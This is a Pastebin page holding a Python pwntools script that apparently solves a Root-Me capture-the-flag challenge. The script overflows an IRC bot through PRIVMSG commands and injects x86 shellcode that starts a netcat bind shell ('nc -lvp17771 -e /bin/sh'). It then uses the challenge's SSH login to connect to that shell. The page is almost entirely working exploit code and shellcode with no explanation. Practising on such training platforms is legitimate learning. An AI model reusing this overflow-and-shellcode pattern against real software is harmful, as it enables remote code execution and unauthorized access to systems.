Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- from pwn import *
- nick = "Pown3dBot"
- mynick = "pedro1"
- print('Connecting...')
- r = remote('irc.root-me.org', 6667) #connection to the irc server
- res = r.recvuntil('instead.')
- print(res)
- r.send('NICK ' + mynick + '\r\n')
- r.send('USER PythonBot my.host.name humm : My Real Name\r\n')
- res = r.recvuntil(mynick + ' +x')
- print(res)
- payload = 'A' * 99 + '\x24\xb1\x04\x08' + 'JOIN'
- r.send('PRIVMSG ' + nick + ' :!' + payload + '\r\n') # sending to the socket
- res = r.recvline()
- print(res)
- payload = '\x90\x90\x90\x31\xc0\x31\xd2\x50\x68\x37\x37\x37\x31\x68\x2d\x76\x70\x31\x89\xe6\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x68\x2d\x6c\x65\x2f\x89\xe7\x50\x68\x2f\x2f\x6e\x63\x68\x2f\x62\x69\x6e\x89\xe3\x52\x56\x57\x53\x89\xe1\xb0\x0b\xcd\x80' + '\x90\x90' + 'PRIVMSG '
- r.send('PRIVMSG ' + nick + ' :!' + payload + '\r\n') # sending to the socket
- res = r.recvline()
- print(res)
- r.send('PRIVMSG ' + nick + ' :AAAA\r\n') # sending to the socket
- res = r.recvline()
- print(res)
- s = ssh(host='challenge02.root-me.org', port=2222, user='app-systeme-ch31', password='app-systeme-ch31')
- shell_nc = s.process(['/bin/nc', 'localhost', '17771'])
- shell_nc.interactive()
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement